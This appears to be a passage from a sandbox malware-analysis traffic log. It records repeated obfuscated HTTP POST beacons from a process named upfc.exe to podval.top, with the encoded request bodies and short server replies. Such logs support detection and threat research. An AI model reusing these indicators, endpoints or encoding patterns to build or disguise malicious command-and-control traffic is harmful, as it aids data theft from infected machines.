                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kjlNEvBoZZ9psscpN3gDgvBWIyd%2FHrQO17cVXUup7bDie2g%2F90yK5ane0L1slv%2Bb5Hd57UMBzIQSPzfMzzF5RuxHSWQkE79WAru9qzcpDyWXsY6MP9l5pWV4N2tF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a54b0fa14399-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    69192.168.2.1049787188.114.97.380
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:03.721242905 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1080
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:04.072758913 CEST1080OUTData Raw: 5a 55 5f 5b 5b 5d 57 5d 58 56 55 51 50 5a 59 52 55 5b 5e 5a 51 55 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU_[[]W]XVUQPZYRU[^ZQUS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2:?&)]%#()=2 -9Y..$!Y03,< ";<"['$Y )
                                                    Jul 3, 2024 16:43:04.188453913 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:04.544120073 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mvnawe8rXYNqd7bQ%2BVhnDrJrgwcA4Sz%2Bu%2Bdc0XLVNjzZFQ6eSaRyNb5z8RfzuvcHJiWN83DDYa2FNH6xRj7qd5ifcRHTFPXOem3eYOVwvzEN5UTZ1HpOmGFnaoJg"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a54eda6b78d9-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    70192.168.2.1049788188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:03.923052073 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:04.276200056 CEST1056OUTData Raw: 5f 5b 5f 5d 5e 5c 57 58 58 56 55 51 50 59 59 54 55 50 5e 5f 51 5e 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_]^\WXXVUQPYYTUP^_Q^S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2)D',$#$*>4-)-&'5)\3#V;7_448"['$Y
                                                    Jul 3, 2024 16:43:04.375960112 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:04.582230091 CEST586INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAK2qXeutTz2BwNX92io7XHxCFxMplWQU5sZ%2BFJuUk1XS%2Fm32tDTV4x6bK9ip%2F9QiMSpNDlOEtEosLEzkz%2BjqldRsUSW%2Fo9AKowPI5F9xgncxFUwEzFz%2BG0Fd57E"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5501ef67283-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    71192.168.2.1049789188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:04.722534895 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    72192.168.2.1049790188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:04.814162970 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:05.166531086 CEST1748OUTData Raw: 5f 5b 5a 5b 5e 5d 57 5e 58 56 55 51 50 5b 59 51 55 5a 5e 54 51 55 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[Z[^]W^XVUQP[YQUZ^TQUS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\')8C&)$3+]>>.75],=93%)03V;>[42^,"['$Y -
                                                    Jul 3, 2024 16:43:05.272058964 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:05.619252920 CEST735INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y9W%2FVHAFAtePRpwanFi5fV8w%2FUvr1rg0ysVvXwzBIPobt2Ul3YiUXqjDVwdgshHaTjI%2FagS3WvEMP9xYKdfgOIMdNpVw%2BhJMz%2B03EX0RLUrqKCeLKGR9Z7Mnnh%2FJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a555abb21962-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 04 27 2a 07 10 32 32 2f 50 2e 2d 06 09 3f 03 24 5e 2d 2a 2d 17 28 27 22 05 3a 10 36 19 34 5c 29 04 2a 2f 28 15 24 33 38 56 36 0b 20 5b 04 1c 23 5d 3f 2a 26 07 2b 38 33 54 25 2f 21 47 25 34 39 59 24 05 07 0f 27 01 2b 10 28 38 31 55 30 32 3c 05 3d 16 3a 1c 3f 0e 32 12 20 34 21 54 02 13 22 57 30 03 1b 52 20 09 3b 1c 31 0e 13 59 33 34 09 55 25 33 25 0a 29 0d 04 57 30 0f 1a 10 21 06 24 0c 33 3b 26 18 30 5b 3d 58 22 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&'*22/P.-?$^-*-('":64\)*/($38V6 [#]?*&+83T%/!G%49Y$'+(81U02<=:?2 4!T"W0R ;1Y34U%3%)W0!$3;&0[=X"#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    73192.168.2.1049791188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:04.939601898 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:05.291486025 CEST1060OUTData Raw: 5f 53 5f 54 5e 5b 52 5f 58 56 55 51 50 5c 59 52 55 51 5e 5d 51 5d 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_T^[R_XVUQP\YRUQ^]Q]SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\13'_($;^=)!>"9>5Y'5\%33R,"2[8<"['$Y 1
                                                    Jul 3, 2024 16:43:05.409528971 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:05.766952991 CEST590INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QNxQ3KTsM%2F8qJG%2B1BQACGPl7jL5%2Fe%2BTqvFQRVT04bveVOGPwPGt7CkAb%2FA2ZWgoOJmYhzJJ1Jbi7We82ypcuE%2BjMmshTOAuc%2FRGOoVxfnlRxEpV3aR1gd%2FahaSLa"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5568d310f93-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    74192.168.2.1049792188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:05.967770100 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:06.322781086 CEST1060OUTData Raw: 5f 53 5a 5f 5e 58 52 5d 58 56 55 51 50 5c 59 53 55 5a 5e 54 51 58 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _SZ_^XR]XVUQP\YSUZ^TQXSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"1:0A'*?_')-:4==]9-]35Y',/?_ T4[,<"['$Y 1
                                                    Jul 3, 2024 16:43:06.421659946 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:06.774306059 CEST588INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H83%2BpY%2B2jWNy1n%2BsyQ2%2B%2Bn8zuJnkJYdvW7sbPekWoZ5o6q7jfZ7hMYk1m7KOwMKait7kUy%2FTl8swun3F1BcPbre%2FOr0yiGv3eXIwgz7iDD7XWLb5pKZizyTZ9IWa"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a55cd84e1799-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    75192.168.2.1049793188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:06.908566952 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:07.260411978 CEST1060OUTData Raw: 5f 55 5f 5b 5b 5a 57 5d 58 56 55 51 50 5c 59 5b 55 58 5e 5e 51 58 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_[[ZW]XVUQP\Y[UX^^QXS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&:$B$:?_38)=57].-09[3;=7_#!4-,"['$Y 1
                                                    Jul 3, 2024 16:43:07.359199047 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:07.700212002 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50Xu0EBOTbDRFKzBHi6w3e%2B1r5xBFHl8WCwGQfqz%2FYoWC0UZtPKQzSsJga8sgd2WKm1Ud0c7Rr5K%2BlmObE31Rgbx4GDBxQbn5Pi8vO%2FmGJ1JCrs1jup%2BOm6q3CO8"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a562bf394251-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    76192.168.2.1049794188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:07.832609892 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:08.184910059 CEST1056OUTData Raw: 5a 50 5a 5c 5b 59 57 50 58 56 55 51 50 59 59 5b 55 5f 5e 5c 51 5e 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZPZ\[YWPXVUQPYY[U_^\Q^SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%:,C&)/$V'*-9 -)Z->0&*3U(;?7"^8<"['$Y
                                                    Jul 3, 2024 16:43:08.290664911 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:08.500013113 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:08 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yuBryzYoP0Qy5fz2appbir9oeIwKAIu5JltDLLTevNMtBExcNBVZhePjcV5rnFzEiS2vRB6s1tnL0VGAnD9SNImeQHnYBWgbZ%2BUtvKN4WpJoPQQNUB9Ap%2FIHil%2B5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a568894343bc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    77192.168.2.1049795188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:08.635104895 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:08.995044947 CEST1060OUTData Raw: 5f 52 5f 54 5b 5d 57 5c 58 56 55 51 50 5f 59 57 55 5d 5e 5d 51 5a 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R_T[]W\XVUQP_YWU]^]QZS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\%/&)$'V+*24.:9>35=X'<;$#2;;<"['$Y =
                                                    Jul 3, 2024 16:43:09.100713015 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:09.441617012 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNakdvaGt9nJT%2F1QWzfSotoZB1EfEJwsYZjoG4b%2FZpAvx12uo4ODjU8FTwNITJ22Y8hdnQtMAq5uB22gVk3rcR0pJ5WMeP1L7QTJNPWi0d0M3o63HhGfXZ2MxS69"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a56d99c9176c-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    78192.168.2.1049796188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:09.592525005 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:09.947793007 CEST1060OUTData Raw: 5f 54 5f 5d 5b 56 57 51 58 56 55 51 50 5b 59 51 55 5f 5e 59 51 58 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_][VWQXVUQP[YQU_^YQXS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%:03$ >=9 .&&=[$3T8=+Z 38"['$Y -
                                                    Jul 3, 2024 16:43:10.062401056 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:10.413378954 CEST571INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqOIZ0aRfhdQoHWP5JtilmlrY5w%2FpUCQZR7IbDWVbCIOQte3Z42GO5nbZDHo64H762m0KkfzA4rUAJgso4MMOMkVjCgLOwmghUcmGSL6Po49j1Jc36A9XfLKQ4AC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5739a794297-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:10.508276939 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    79192.168.2.1049797188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:10.767369032 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:11.119899988 CEST1060OUTData Raw: 5f 5a 5a 5c 5b 56 57 5b 58 56 55 51 50 5e 59 51 55 5c 5e 5a 51 5e 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZ\[VW[XVUQP^YQU\^ZQ^SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%/$:+Y'0(.T!=%-X9\0>300,#_"! X;"['$Y
                                                    Jul 3, 2024 16:43:11.127254009 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:11.554713964 CEST576INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZGyrXv3Zm7W5NauLpYmEkJbJTrsbPDfSVrYBRhlDOO%2FYKAbF1y4u58OQNR7ymqGlwFHwWUjgFncumstq6D6iXUWssT7mHxGQPnTq7rGrkFVbGXx0UatdUcLWTWFo"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a57a3db57c78-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    80192.168.2.1049798188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:10.767451048 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
